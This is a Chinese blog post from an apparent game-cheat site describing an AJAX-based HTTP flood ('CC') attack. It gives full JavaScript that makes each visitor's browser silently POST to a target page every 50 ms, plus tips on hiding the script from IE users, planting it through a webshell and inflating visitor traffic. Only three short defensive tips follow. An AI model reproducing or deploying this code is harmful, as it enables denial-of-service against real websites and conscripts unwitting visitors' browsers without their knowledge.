提供最新游戏辅助,QQ活动,QQ技巧,QQ软件,努力打造为一个最绿色无毒的游戏辅助网,凌哥QQ:1027663760

基于ajax的CC攻击思路及其防御

浏览次数:11490 发布时间:2015-3-1 13:03 当前分类:其它源码 评论数量:加载中

首先需要有自己的web站点或webshell来建立或修改某页面加入ajax代码,用户访问自己所建立的ajax页面,ajax页面自动不断地向指定被攻击站点的页面发送数据包,实现cc攻击效果。由于ajax跨域安全限制,发送数据包后浏览器是不会获取返回数据的,这样对当前访问的用户基本没有影响,跟正常访问没区别。

1、选择目标站点的被攻击的页面要选择其中获取数据量较大的页面

2、因为跨域限制,在IE下会弹出警告,为了自己站点的正常访问最好加上代码忽略掉ie浏览器用户

3、为了保证ajax页面访问量,可通过一些免费互刷网站流量平台来实现提高ajax页面的访问量

示例代码如下:
<script type="text/javascript">
 var t_postdata='id=abcdefgabcdefgabcdefgabcdefg';
 
 var t_url='http://被攻击网站/被攻击页面.php';
 function c_xmlHttp(){
  if(window.ActiveXObject){
   xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');
  }else if(window.XMLHttpRequest){
   xmlHttp=new XMLHttpRequest();
  }
  return xmlHttp;
 }
 
 function post_send(){
  var xmlHttp=c_xmlHttp();
  xmlHttp.open("POST",t_url,true);
  xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xmlHttp.send(t_postdata);
  r_send();
 }
 
 function r_send(){
  setTimeout("post_send()", 50);
 }
 
 var ie = !-[1,];
 if(!ie){
 setTimeout("post_send()", 2000);
 }
 </script>

防御方法:

1、对数据量比较大的页面使用缓存,尽量减少数据库连接;

2,对访问者设置session或cookie,限制时段内访问次数;

3,缩短Timeout时间,连接过多时丢弃一部分数据。

玖爱辅助网 - 本站版权及附件下载说明

1、本站所有文章均由凌哥发布,与玖爱辅助网同时享有本文章相关版权

2、同类型的网站与软件站 在转载本站原创软件时请注明软件来源:玖爱辅助网

3、如果您在下载本站的软件/教程出现任何问题可以:查看软件下载教程

4、本文链接:http://www.9ifz.cc/qtym/478.html百度收录:已收录

二维码

上一篇:CF3月14日15:30准点在线领取精彩豪礼!

下一篇:种子搜索神器,十几万个种子任你选!

相关内容推荐